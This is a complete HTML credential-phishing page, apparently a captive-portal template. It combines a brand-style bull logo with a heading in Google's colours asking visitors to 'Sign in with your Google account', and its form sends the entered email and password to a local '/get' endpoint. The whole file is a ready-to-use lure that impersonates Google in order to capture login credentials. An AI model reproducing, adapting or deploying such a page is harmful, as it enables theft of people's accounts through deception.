<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #EE283B;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFCC2A;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #EE283B;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #EE283B;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 1px solid #EE283B;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #364777;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #EE283B;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #EE283B;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="150.000000pt" height="150.000000pt" viewBox="0 0 500.000000 500.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,500.000000) scale(0.100000,-0.100000)"
fill="#EE283B" stroke="none">
<path d="M210 3865 c0 -95 46 -145 133 -145 41 0 73 -21 64 -43 -3 -9 -29 -33
-57 -53 -61 -44 -99 -105 -107 -172 -15 -131 82 -213 235 -198 l62 7 0 -40 c0
-23 11 -69 23 -103 13 -35 22 -69 20 -76 -7 -20 -63 -45 -113 -51 -43 -6 -46
-8 -72 -63 -15 -31 -39 -64 -54 -75 -14 -10 -40 -30 -58 -45 -17 -15 -43 -37
-58 -49 -37 -27 -40 -83 -5 -93 53 -14 75 -7 114 38 36 41 43 44 85 44 46 -1
59 5 121 54 25 20 40 23 130 24 89 0 110 4 159 27 45 21 62 35 78 66 26 51 25
61 -3 61 -13 0 -37 -15 -57 -36 -49 -52 -84 -64 -195 -64 -106 0 -141 -10
-201 -60 -34 -29 -33 -27 7 13 51 51 95 67 180 67 66 0 109 13 165 51 50 34
98 101 90 126 -7 21 10 133 22 145 4 4 8 -30 7 -77 0 -117 3 -120 148 -121 62
0 149 -4 193 -9 l82 -8 -5 47 c-6 49 10 65 21 21 9 -35 62 -93 107 -116 41
-21 64 -48 74 -90 6 -24 2 -28 -53 -52 -76 -35 -88 -34 -108 6 -9 17 -28 44
-42 60 -22 23 -33 27 -84 27 -67 0 -71 -8 -36 -70 18 -31 29 -40 50 -40 22 0
32 -8 48 -40 37 -73 76 -77 205 -20 49 22 101 40 115 40 33 0 63 21 89 64 29
46 26 76 -14 156 -32 63 -38 70 -65 70 l-30 0 35 -70 c40 -80 41 -87 18 -135
-21 -44 -35 -46 -22 -3 11 40 7 52 -42 137 -21 37 -39 70 -39 73 0 3 13 8 30
11 65 14 102 59 119 150 l9 42 1 -53 c1 -35 -6 -66 -19 -93 -18 -35 -19 -40
-5 -46 9 -3 47 -1 85 6 90 14 97 14 82 -1 -7 -7 -12 -20 -12 -29 0 -10 -16
-34 -35 -55 -41 -43 -49 -90 -14 -79 21 7 21 7 4 -23 -15 -24 -16 -37 -9 -64
9 -30 13 -33 49 -32 22 0 67 8 100 17 32 9 82 17 111 17 37 0 59 6 79 22 18
14 32 18 40 12 77 -57 99 -68 153 -71 62 -4 61 1 -8 39 -21 12 -39 36 -56 75
-14 32 -33 66 -41 75 -8 9 -13 22 -11 29 2 7 19 -7 39 -31 79 -100 104 -120
148 -120 22 0 41 2 41 4 0 2 -17 15 -39 29 -22 15 -51 49 -69 81 -18 30 -41
60 -52 66 -13 7 -20 21 -20 40 0 16 -10 53 -21 82 -12 29 -27 93 -35 142 -7
48 -23 108 -35 132 -24 50 -164 212 -234 270 -25 21 -69 59 -98 83 -67 58
-120 81 -187 81 -47 0 -65 -6 -128 -44 -40 -25 -97 -50 -125 -57 -73 -17 -142
-53 -166 -88 -17 -24 -31 -31 -69 -36 -84 -10 -119 -24 -160 -64 -63 -61 -86
-73 -166 -82 -85 -9 -132 -30 -197 -88 -97 -85 -198 -116 -272 -83 -50 22 -67
45 -67 91 0 60 23 92 153 208 41 37 47 47 47 82 0 53 -38 98 -88 106 -20 4
-49 9 -64 11 -14 3 -52 21 -83 40 -32 19 -59 34 -61 34 -2 0 -4 -20 -4 -45z"/>
<path d="M4755 3894 c-40 -31 -98 -56 -153 -64 -73 -12 -112 -50 -112 -111 0
-35 6 -45 47 -82 130 -116 153 -148 153 -208 0 -46 -17 -69 -67 -91 -74 -33
-175 -2 -272 83 -65 58 -112 79 -197 88 -80 9 -103 21 -166 82 -41 40 -76 54
-160 64 -38 5 -52 12 -69 36 -24 35 -93 71 -166 88 -28 7 -85 32 -125 57 -63
38 -81 44 -128 44 -67 0 -120 -23 -187 -81 -29 -24 -73 -62 -98 -83 -70 -58
-210 -220 -234 -270 -12 -24 -28 -84 -35 -132 -8 -49 -23 -113 -35 -142 -11
-29 -21 -66 -21 -82 0 -19 -7 -33 -20 -40 -11 -6 -34 -36 -52 -66 -18 -32 -47
-66 -69 -81 -22 -14 -39 -27 -39 -29 0 -2 19 -4 41 -4 44 0 69 20 148 120 20
24 37 38 39 31 2 -7 -3 -20 -11 -29 -8 -9 -27 -43 -41 -75 -17 -39 -35 -63
-56 -75 -69 -38 -70 -43 -8 -39 54 3 76 14 153 71 8 6 22 2 40 -12 20 -16 42
-22 79 -22 29 0 79 -8 111 -17 33 -9 78 -17 100 -17 36 -1 40 2 49 32 7 27 6
40 -9 64 -17 30 -17 30 4 23 35 -11 27 36 -14 79 -19 21 -35 45 -35 55 0 9 -5
22 -12 29 -15 15 -8 15 82 1 38 -7 76 -9 85 -6 14 6 13 11 -5 46 -13 27 -20
58 -19 93 l1 53 9 -42 c17 -91 54 -136 119 -150 17 -3 30 -8 30 -11 0 -3 -18
-36 -39 -73 -49 -85 -53 -97 -42 -137 13 -43 -1 -41 -22 3 -23 48 -22 55 18
135 l35 70 -30 0 c-27 0 -33 -7 -65 -70 -40 -80 -43 -110 -14 -156 26 -43 56
-64 89 -64 14 0 66 -18 115 -40 129 -57 168 -53 205 20 16 32 26 40 48 40 21
0 32 9 50 40 35 62 31 70 -36 70 -51 0 -62 -4 -84 -27 -14 -16 -33 -43 -42
-60 -20 -40 -32 -41 -108 -6 -55 24 -59 28 -53 52 10 42 33 69 74 90 45 23 98
81 107 116 11 44 27 28 21 -21 l-5 -47 82 8 c44 5 131 9 193 9 145 1 148 4
148 121 -1 47 3 81 7 77 12 -12 29 -124 22 -145 -8 -25 40 -92 90 -126 56 -38
99 -51 165 -51 85 0 129 -16 180 -67 40 -40 41 -42 7 -13 -60 50 -95 60 -201
60 -111 0 -146 12 -195 64 -20 21 -44 36 -57 36 -28 0 -29 -10 -3 -61 16 -31
33 -45 78 -66 49 -23 70 -27 159 -27 90 -1 105 -4 130 -24 62 -49 75 -55 121
-54 42 0 49 -3 85 -44 39 -45 61 -52 115 -38 34 10 31 66 -5 93 -16 12 -42 34
-59 49 -18 15 -44 35 -58 45 -15 11 -39 44 -54 75 -26 55 -29 57 -72 63 -50 6
-106 31 -113 51 -2 7 7 41 20 76 12 34 23 80 23 103 l0 40 63 -7 c78 -8 136 7
182 47 91 80 64 237 -55 323 -28 20 -54 44 -57 53 -9 22 23 43 64 43 87 0 133
50 133 145 0 49 -4 52 -35 29z"/>
<path d="M2337 3869 c-43 -10 -111 -35 -150 -55 -75 -38 -167 -100 -167 -114
0 -4 30 -41 66 -81 119 -133 146 -183 159 -299 4 -36 18 -96 31 -134 13 -38
24 -77 24 -86 0 -9 9 -25 20 -35 11 -10 33 -41 49 -70 18 -31 44 -61 66 -73
19 -12 38 -29 41 -37 8 -20 -13 -45 -38 -45 -15 0 -19 -5 -15 -20 9 -34 -15
-52 -69 -52 -58 1 -96 14 -143 49 -32 25 -34 25 -62 9 -17 -10 -56 -18 -96
-20 -61 -3 -173 -30 -173 -43 0 -13 68 -101 114 -146 91 -92 207 -158 338
-193 87 -24 280 -24 367 0 180 49 324 150 429 303 l22 31 -67 23 c-37 12 -98
24 -136 25 -40 2 -79 10 -96 20 -28 16 -30 16 -62 -9 -47 -35 -85 -48 -143
-49 -54 0 -78 18 -69 52 4 15 0 20 -15 20 -25 0 -46 25 -38 45 3 8 22 25 41
37 22 12 48 42 66 73 16 29 38 60 49 70 11 10 20 26 20 36 0 11 9 42 20 71 11
29 27 95 35 146 20 135 29 151 203 351 l42 49 -68 46 c-85 56 -145 82 -247
107 -104 25 -243 24 -348 -2z"/>
<path d="M2170 2044 l0 -286 -30 25 c-74 62 -206 75 -298 28 -255 -130 -250
-572 7 -697 20 -11 67 -20 109 -22 82 -5 142 12 186 53 l26 24 0 -29 0 -30
105 0 105 0 0 610 0 610 -105 0 -105 0 0 -286z m-44 -438 c81 -85 79 -213 -5
-289 -70 -63 -143 -58 -205 15 -74 87 -63 218 24 292 26 21 42 26 87 26 54 0
59 -2 99 -44z"/>
<path d="M4350 1720 l0 -610 105 0 105 0 0 610 0 610 -105 0 -105 0 0 -610z"/>
<path d="M4690 1720 l0 -610 105 0 105 0 0 610 0 610 -105 0 -105 0 0 -610z"/>
<path d="M100 1651 l0 -541 110 0 110 0 0 450 0 450 43 0 c61 0 110 -16 137
-45 19 -20 25 -40 28 -90 3 -39 -1 -77 -8 -95 -15 -35 -60 -66 -112 -75 l-38
-7 0 -125 0 -126 103 -168 102 -169 133 0 c104 0 132 3 126 13 -4 6 -72 108
-151 224 l-143 213 50 21 c55 24 98 67 132 132 26 50 37 198 19 264 -21 77
-69 134 -145 173 l-69 35 -213 3 -214 4 0 -541z"/>
<path d="M2720 1650 l0 -542 228 4 c257 5 289 12 365 78 61 54 90 124 91 220
0 126 -48 226 -129 264 l-35 17 25 33 c35 46 59 146 50 214 -15 120 -56 182
-149 224 -47 21 -68 23 -248 26 l-198 4 0 -542z m288 359 c68 -14 94 -44 100
-113 7 -83 -33 -146 -93 -146 -12 0 -15 -17 -15 -85 0 -94 -7 -86 81 -100 74
-11 118 -80 103 -160 -14 -78 -72 -115 -179 -115 l-65 0 0 365 c0 224 4 365
10 365 5 0 31 -5 58 -11z"/>
<path d="M1055 1830 c-93 -24 -168 -89 -210 -183 -40 -88 -47 -225 -16 -325
25 -84 88 -160 165 -199 74 -39 216 -44 300 -12 33 12 78 39 100 60 l41 38
-67 67 -67 68 -38 -43 c-34 -38 -45 -44 -89 -48 -46 -5 -54 -2 -86 25 -33 30
-58 85 -58 131 0 21 2 21 230 21 l230 0 0 45 c0 168 -91 311 -223 350 -53 16
-161 18 -212 5z m160 -152 c26 -12 57 -55 70 -95 l6 -23 -125 0 c-138 0 -141
2 -111 60 32 62 98 86 160 58z"/>
<path d="M3582 1558 c3 -252 4 -265 27 -316 48 -105 137 -152 291 -152 154 0
244 47 291 152 23 51 24 65 27 316 l4 262 -106 0 -106 0 0 -212 c0 -117 -5
-231 -10 -252 -27 -118 -168 -123 -200 -7 -5 20 -10 134 -10 254 l0 217 -106
0 -105 0 3 -262z"/>
</g>
</svg>




  </div>

  <div class="form-container">

    <center><h1><b>Sign in with your <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
 account</b></h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	  
	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>

      <button class="submit-btn" type="submit">Connect</button>
    
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
